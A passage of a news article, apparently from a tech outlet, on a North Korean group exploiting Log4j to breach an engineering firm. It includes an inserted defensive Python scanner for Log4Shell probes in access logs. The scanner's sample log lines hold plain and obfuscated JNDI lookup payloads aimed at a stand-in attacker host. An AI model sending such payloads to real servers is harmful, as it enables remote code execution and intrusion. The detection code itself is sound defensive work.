Hackers used the Log4j flaw to gain access before moving across a company’s network, say security researchers


A North Korean hacking and cyber-espionage operation breached the network of an engineering firm linked to military and energy organisations by exploiting a cybersecurity vulnerability in Log4j. 

First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j, a widely used Java logging library. 

The ubiquitous nature of Log4j meant cybersecurity agencies urged organisations globally to apply security updates as quickly as possible, but months on from disclosure, many are still vulnerable to the flaw.


According to cybersecurity researchers at Symantec, one of those companies that was still vulnerable was an undisclosed engineering firm that works in the energy and military sectors. That vulnerability resulted in the company being breached when attackers exploited the gap on a public-facing VMware View server in February this year. From there, attackers were able to move around the network and compromise at least 18 computers. 
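One practical check a defender can run after an incident like the one above is to sweep the web server's access logs for the lookup string that triggers CVE-2021-44228. The following is an added example written for this article, not code from ZDNet, Symantec or the Log4j project; the log lines are constructed, and the normalisation step covers only the two most common ways the string is disguised (nested `${lower:}`/`${upper:}` lookups and `${x:-default}` fallbacks), so it is a starting point rather than a complete detector.

```python
import re

# Constructed sample access-log lines (not from the article): one benign request,
# one plain JNDI lookup in the User-Agent, and one obfuscated with nested lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 0 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [12/Feb/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 0 "-" '
    '"${${lower:j}${upper:n}di:${lower:ldap}://203.0.113.7/x}"',
]

# ${lower:x} / ${upper:x}: the inner text is what Log4j would substitute.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default}: an undefined lookup falls back to the text after ':-'.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup prefix that hands the string to JNDI.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line):
    """Collapse nested case/default lookups, innermost first, until nothing changes."""
    prev = None
    while prev != line:
        prev = line
        line = _CASE_LOOKUP.sub(lambda m: m.group(1), line)
        line = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), line)
    return line


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (1-based line number, line) for every line that looks like a probe."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

Running the module prints the two suspicious lines (2 and 3); the benign request on line 1 is not reported. On a real server the same `scan()` can be fed the access log line by line, and any hit is worth correlating with outbound LDAP or HTTP connections from the affected host, since a successful exploit needs the server to fetch the attacker-hosted object.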


Analysis by Symantec researchers suggests that the campaign is by a group they call Stonefly, also known as DarkSeoul, BlackMine, Operation Troy, and Silent Chollima, which is an espionage group working out of North Korea.  

Other cybersecurity researchers have suggested that Stonefly has links with Lazarus Group, North Korea’s most infamous hacking operation. 

But while Lazarus Group’s activity often focuses on stealing money and
